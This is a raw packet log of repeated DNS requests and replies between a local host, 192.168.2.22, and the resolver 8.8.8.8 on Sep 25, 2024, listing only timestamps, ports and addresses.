                                                            Sep 25, 2024 08:31:13.833000898 CEST5739053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.839834929 CEST53573908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.839982033 CEST5739053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.847421885 CEST53573908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.847584963 CEST5739053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.854715109 CEST53573908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.854867935 CEST5739053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.862317085 CEST53573908.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.983556032 CEST5809553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.990798950 CEST53580958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.990964890 CEST5809553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:13.998121023 CEST53580958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:13.998280048 CEST5809553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.005928040 CEST53580958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.006102085 CEST5809553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.013468027 CEST53580958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.013638973 CEST5809553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.020488977 CEST53580958.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.169218063 CEST5426153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.176233053 CEST53542618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.176469088 CEST5426153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.183511019 CEST53542618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.183782101 CEST5426153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.190798998 CEST53542618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.191034079 CEST5426153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.197988033 CEST53542618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:14.198263884 CEST5426153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:14.205116034 CEST53542618.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.148466110 CEST6050753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.164691925 CEST53605078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.164880037 CEST6050753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.179038048 CEST53605078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.179203987 CEST6050753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.192583084 CEST53605078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.192790031 CEST6050753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.206100941 CEST53605078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.206275940 CEST6050753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.219800949 CEST53605078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.338043928 CEST5044653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.352545977 CEST53504468.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.352761984 CEST5044653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.365884066 CEST53504468.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.366055965 CEST5044653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.379553080 CEST53504468.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.379731894 CEST5044653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.391786098 CEST53504468.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:18.391954899 CEST5044653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:18.404282093 CEST53504468.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.631145954 CEST5593953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.638341904 CEST53559398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.638601065 CEST5593953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.645456076 CEST53559398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.645864964 CEST5593953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.652544975 CEST53559398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.652753115 CEST5593953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.659625053 CEST53559398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.659867048 CEST5593953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.666917086 CEST53559398.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.783317089 CEST4960853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.791052103 CEST53496088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.791271925 CEST4960853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.797985077 CEST53496088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.798124075 CEST4960853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.805039883 CEST53496088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.805221081 CEST4960853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.811997890 CEST53496088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:21.812423944 CEST4960853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:21.819235086 CEST53496088.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:24.852963924 CEST6148653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:24.861008883 CEST53614868.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:24.861177921 CEST6148653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:24.868079901 CEST53614868.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:24.868199110 CEST6148653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:24.874860048 CEST53614868.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:24.874979973 CEST6148653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:24.883094072 CEST53614868.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:24.883222103 CEST6148653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:24.889533997 CEST53614868.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:29.311150074 CEST6245353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:29.318397045 CEST53624538.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:29.323235989 CEST6245353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:29.330156088 CEST53624538.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:29.335155010 CEST6245353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:29.341949940 CEST53624538.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:29.342314959 CEST6245353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:29.349128008 CEST53624538.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:29.349699020 CEST6245353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:29.356571913 CEST53624538.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:33.852998018 CEST5056853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:33.866209984 CEST53505688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:33.866600990 CEST5056853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:33.873416901 CEST53505688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:33.873711109 CEST5056853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:33.880711079 CEST53505688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:33.880994081 CEST5056853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:33.888442993 CEST53505688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:33.888680935 CEST5056853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:33.896075964 CEST53505688.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.008805037 CEST6146753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.015952110 CEST53614678.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.016288996 CEST6146753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.023451090 CEST53614678.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.023709059 CEST6146753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.030375957 CEST53614678.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.030574083 CEST6146753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.037874937 CEST53614678.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.038151026 CEST6146753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.045380116 CEST53614678.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.149380922 CEST6161853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.156388044 CEST53616188.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.156585932 CEST6161853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.163506985 CEST53616188.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.163672924 CEST6161853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.170733929 CEST53616188.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.170867920 CEST6161853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.177172899 CEST53616188.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.177341938 CEST6161853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.184253931 CEST53616188.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.297002077 CEST5442253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.303664923 CEST53544228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.303854942 CEST5442253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.310863018 CEST53544228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.310992002 CEST5442253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.318192005 CEST53544228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.318326950 CEST5442253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.325134039 CEST53544228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:34.325253963 CEST5442253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:34.332220078 CEST53544228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:38.785799980 CEST5207453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:38.794321060 CEST53520748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:38.855537891 CEST5207453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:38.862059116 CEST53520748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:38.973041058 CEST5207453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:38.979388952 CEST53520748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.270939112 CEST5207453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.278388023 CEST53520748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.351064920 CEST5207453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.357639074 CEST53520748.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.508625031 CEST5033753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.517018080 CEST53503378.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.517237902 CEST5033753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.523772001 CEST53503378.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.524029970 CEST5033753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.534148932 CEST53503378.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.535295963 CEST5033753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.545753002 CEST53503378.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.548677921 CEST5033753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.556473970 CEST53503378.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.677927017 CEST6182653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.685565948 CEST53618268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.685776949 CEST6182653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.692259073 CEST53618268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.692437887 CEST6182653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.699596882 CEST53618268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.699765921 CEST6182653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.714843988 CEST53618268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:39.715091944 CEST6182653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:39.721966028 CEST53618268.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:44.098179102 CEST5632953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:44.105978012 CEST53563298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:44.106189966 CEST5632953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:44.112503052 CEST53563298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:44.112648010 CEST5632953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:44.119085073 CEST53563298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:44.119259119 CEST5632953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:44.126230955 CEST53563298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:44.127130985 CEST5632953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:44.134004116 CEST53563298.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.199218035 CEST6346953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.206239939 CEST53634698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.206470013 CEST6346953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.213459969 CEST53634698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.214011908 CEST6346953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.220782042 CEST53634698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.220971107 CEST6346953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.439754963 CEST53634698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.440063953 CEST6346953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.447596073 CEST53634698.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.569919109 CEST5944753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.576834917 CEST53594478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.577239037 CEST5944753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.584281921 CEST53594478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.584971905 CEST5944753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.591917038 CEST53594478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.597623110 CEST5944753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.604644060 CEST53594478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.609376907 CEST5944753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.616424084 CEST53594478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.719914913 CEST5182853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.727279902 CEST53518288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.727653027 CEST5182853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.735761881 CEST53518288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.736063004 CEST5182853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.744043112 CEST53518288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.744390965 CEST5182853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.753088951 CEST53518288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.759186029 CEST5182853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.766299009 CEST53518288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.883213997 CEST5340653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.890347958 CEST53534068.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.891050100 CEST5340653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.897409916 CEST53534068.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.898062944 CEST5340653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.904468060 CEST53534068.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.904836893 CEST5340653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.911137104 CEST53534068.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:48.911406040 CEST5340653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:48.918046951 CEST53534068.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.679301023 CEST5634553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.687669039 CEST53563458.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.695177078 CEST5634553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.702198982 CEST53563458.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.703540087 CEST5634553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.710417032 CEST53563458.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.711508036 CEST5634553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.718358994 CEST53563458.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.721528053 CEST5634553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.727880955 CEST53563458.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.848447084 CEST5187053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.854849100 CEST53518708.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.855066061 CEST5187053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.861890078 CEST53518708.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.862066984 CEST5187053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.868648052 CEST53518708.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.871334076 CEST5187053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.878483057 CEST53518708.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:52.878740072 CEST5187053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:52.885298014 CEST53518708.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.355252981 CEST6500953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.362173080 CEST53650098.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.363166094 CEST6500953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.369301081 CEST53650098.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.369659901 CEST6500953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.376456022 CEST53650098.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.377202988 CEST6500953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.383559942 CEST53650098.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.384654999 CEST6500953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.390934944 CEST53650098.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.513773918 CEST6495653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.520279884 CEST53649568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.520693064 CEST6495653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.527551889 CEST53649568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.527968884 CEST6495653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.534796953 CEST53649568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.535053015 CEST6495653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.541990995 CEST53649568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.542382956 CEST6495653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.549345970 CEST53649568.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.659791946 CEST5452153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.666124105 CEST53545218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.666469097 CEST5452153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.672784090 CEST53545218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.673145056 CEST5452153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.679367065 CEST53545218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.679682016 CEST5452153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.686012030 CEST53545218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.687364101 CEST5452153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.693562984 CEST53545218.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.808154106 CEST4975053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.815228939 CEST53497508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.815854073 CEST4975053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.822472095 CEST53497508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.822923899 CEST4975053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.829236984 CEST53497508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.829657078 CEST4975053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.836644888 CEST53497508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.836905956 CEST4975053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.843312025 CEST53497508.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.966521025 CEST6468753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.973449945 CEST53646878.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.976900101 CEST6468753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.983525038 CEST53646878.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.984211922 CEST6468753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.991147995 CEST53646878.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.991391897 CEST6468753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:56.997776031 CEST53646878.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:56.998315096 CEST6468753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.005939960 CEST53646878.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.117619991 CEST6508453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.124403954 CEST53650848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.125319958 CEST6508453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.132200956 CEST53650848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.132658958 CEST6508453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.139445066 CEST53650848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.142416954 CEST6508453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.148540020 CEST53650848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.149014950 CEST6508453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.155399084 CEST53650848.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.273417950 CEST6337353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.777311087 CEST53633738.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.777626991 CEST6337353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.784668922 CEST53633738.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.784884930 CEST6337353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.791711092 CEST53633738.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.791884899 CEST6337353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.798187017 CEST53633738.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.798356056 CEST6337353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.805521965 CEST53633738.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.910166979 CEST5620753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.917115927 CEST53562078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.917292118 CEST5620753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.926259995 CEST53562078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.926439047 CEST5620753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.934274912 CEST53562078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.934462070 CEST5620753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.942642927 CEST53562078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:57.942831039 CEST5620753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:57.949095011 CEST53562078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.078936100 CEST5195553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.086045980 CEST53519558.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.086422920 CEST5195553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.093139887 CEST53519558.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.093384027 CEST5195553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.100141048 CEST53519558.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.100316048 CEST5195553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.107234955 CEST53519558.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.107409954 CEST5195553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.113677025 CEST53519558.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.220227957 CEST5897153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.226977110 CEST53589718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.227137089 CEST5897153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.233784914 CEST53589718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.233932018 CEST5897153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.240799904 CEST53589718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.240926981 CEST5897153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.247713089 CEST53589718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:31:58.247844934 CEST5897153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:31:58.254601955 CEST53589718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.543523073 CEST5101453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.550693035 CEST53510148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.555141926 CEST5101453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.562066078 CEST53510148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.563522100 CEST5101453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.569782972 CEST53510148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.570146084 CEST5101453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.576414108 CEST53510148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.581866980 CEST5101453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.588232994 CEST53510148.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:32:02.702120066 CEST4969053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:32:02.708707094 CEST53496908.8.8.8192.168.2.22
